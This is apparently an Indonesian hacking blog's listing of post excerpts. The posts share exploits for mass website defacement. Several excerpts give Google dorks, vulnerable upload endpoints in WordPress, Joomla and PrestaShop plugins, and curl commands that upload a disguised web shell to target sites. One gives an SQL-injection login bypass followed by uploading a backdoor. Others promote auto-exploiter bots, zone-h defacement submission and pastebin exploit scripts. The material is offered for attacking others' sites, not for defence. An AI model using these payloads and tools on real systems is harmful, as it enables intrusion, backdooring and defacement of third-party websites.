Halo selamat malam, kali ini saya akan memberikan sedikit tutorial bagaimana menemukan sebuah celah/vulnerability NO REDIRECT pada suatu situs. Celah ini ditemukan pada suatu halaman/file yang seharusnya dapat diakses hanya pada user...
Exploit Title: WordPress Plugin Job Manager File UploadGoogle Dork: inurl:/wp-content/uploads/job-manager-uploads/Vuln Path: /jm-ajax/upload_fileExample:www.target.com/jm-ajax/upload_file/( Vuln Target )Exploit:1. CSRF2. CURL POSTroot # curl -k -F "file=@shell.gif" "http://target.com/jm-ajax/upload_file/"Upload file anda dengan format .gif/.jpg/.pngScript:- https://pastebin.com/hp0jJr1g [PHP][CLI Based]- https://pastebin.com/FaACEDLg [BASH]Ayo kawan kita boom...
Exploit Title: WordPress Business Directory Plugin File UploadAuthor: Jingklong ( Bahari Trouble Maker )Google Dork: inurl:/wp-content/ inurl:/business-directory-pluginVuln Path: /wp-admin/admin-ajax.php?action=wpbdp-file-field-uploadExample Target:http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload( Vuln Target )Exploit:1. CSRF2. CURL POSTroot # curl -v -k -F "file=@shell.gif" "http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload"Uplod file...
Google Dork: intext:"Powered By Nusiorung"Login Dengan Username & PasswordUsername : ' OR 1 #Password : ' OR 1 #Jika sudah login, langsung menuju "Document" untuk mengupload shell backdoor.Setelah itu, klik kotak pada...
Baru baru ini ditemukan kerentanan pada PHPMailer yang memungkinkan attacker mendapatkan akses ke server melalui Remote Code Execution (RCE). PHPMailer sendiri merupakan salah satu library open source PHP populer untuk mengirim...
[+] Google Dork: inurl:"/modules/blocktestimonial/"[+] Vuln: www.target.com/modules/blocktestimonial/addtestimonial.php[+] Tutorial: - http://www.tkjcyberart.org/2016/12/prestashop-blocktestimonial-upload.html- http://3xploi7.blogspot.co.id/2016/12/pretashop-blocktestimonial-upload-shell.html[+] Exploiter: http://pastebin.com/8kvqR7u1 ( Web Based ) Saya sudah membuat tools untuk memudahkan kita mengexploit targetnya....Silakan download exploiternya, lalu upload di shell/hosting...
Ya kali ini kita akan membahas HID (Human Interfaes Device) attack yang kaya rubber ducky itu yang dibuat Darren Kitchen. HID attack itu adalah waktu kita colokin device ini ke laptop...
Haloo guys. Kali ini ane mau share bot bing dorker + auto exploit + zone-h submit untuk exploit elfinder di hostig nazuka. Jadi tinggal masukkan dork bing nya, tinggal coli, dan...
BBQSQL adalah alat yang dapat digunakan untuk membantu eksekusi ketika kalian melakukan audit server dan menemukan celah Blind SQL. Tool ini merupakan blind SQL injection framework yang ditulis menggunakan bahasa python....
Celah cukup berbahaya pada kernel Linux baru saja ditemukan. Nama COW sendiri berasal dari mekanisme copy-on-write (COW) dalam kernel Linux, yang mana exploit ini sendiri memungkinkan "unprivileged" user untuk memodifikasi file...
Hallo~~ selamat malam, kali ini gua akan share tools lagi buat kalian penyuka exploit sql injection CMS Lokomedia.Biar ga pusing-pusing, ini tools gua buat supaya lebih mudah aja hehehe Oke Langsung...
Selamat Malam gaannnnn, di malem minggu yang suram karena disini hujan :v gua hadir lagi ngasih tutor yang bermanfaat nih buat kalian para defacer.daripada pacaran :v mending kesini gannn :pOke gausah...
Assalamualaikum, selamat malam gannnn......Sorry baru ini gua posting lagi di karenakan sekarang udah jarang dpt exploit" fresh wkwkwkk dan bingung juga mau bikin tutor apa. :v Okee gausah panjang lebar, dalam...
Hai semuanya, udah lama banget ngk buat tutor. Gw udh mulai bosen dgn semua ini. Makanya gw pengen share Tools yang menurut gw manteb untuk maen bot - botan..Cara kerja tools...
==================================================================Title: Joomla Component com_jwallpapers Arbitrary File UploadAuthor: Mr. Error 404 - IndoXploitGoogle Dork: inurl:/index.php?option=com_jwallpapersvuln: /index.php?option=com_jwallpapers&task=uploadoutput vuln: {"jsonrpc" : "2.0", "result" : null, "id" : "id"}Thanks to: ./Mister-Y404 & All Member IndoXploitGreetz:...
Okeee lagi-lagi masih dalam exploit popoji cms, kali ini gua akan mengembangkan lagi exploit terdahulunyaaa.Yappp, kali ini mungkin akan sangat mudahhhhhh sekaliii bagi kalian para penikmat bot instann :v oke gaperlu...
Kyknyaa lagi fresh nih yaa exploit hahahahaaa.okedeh gausah banyak bacott, kali ini gua akan share Tools yang memudahkan kalian untuk registrasion admin untuk POPOJI CMS.okeee ini diaa bentuknyaaaaa.Masukan Email kalian: [email...
halooooo, udah lama ga coding lagi nihhh.iseng-isengg, balik ngoding lagiii dan coba buat memperbagus sebuah tools yang sangat LEGEND banget nih. Yaitu Webdav Xploiter.Yappp, siapa sih yang gatau dengan tools Webdav?...
Auto Exploiter WebDav thx to @AderootTool webdav yang terkenal yaitu toolnya hmei7, tapi kali ini ane pengen share tool webdav versi php.script:http://pastebin.com/eTmsR6JAvideo:https://www.youtube.com/watch?v=LXmfzEVM0mMbagi yang belum tau cara menjalankannya.cek cara menjalankan exploiter phpyuk join!https://www.facebook.com/groups/indoxploitpublic/keep...
Dalam zip ini, udah ada exploiter,doc root,shell idx.dan didalam source exploiternyaa, sudah ada penjelasan, file" apa yang boleh diganti dan tidak diganti, selebihnya harap ikutin code yang ada , daripada nantinya...
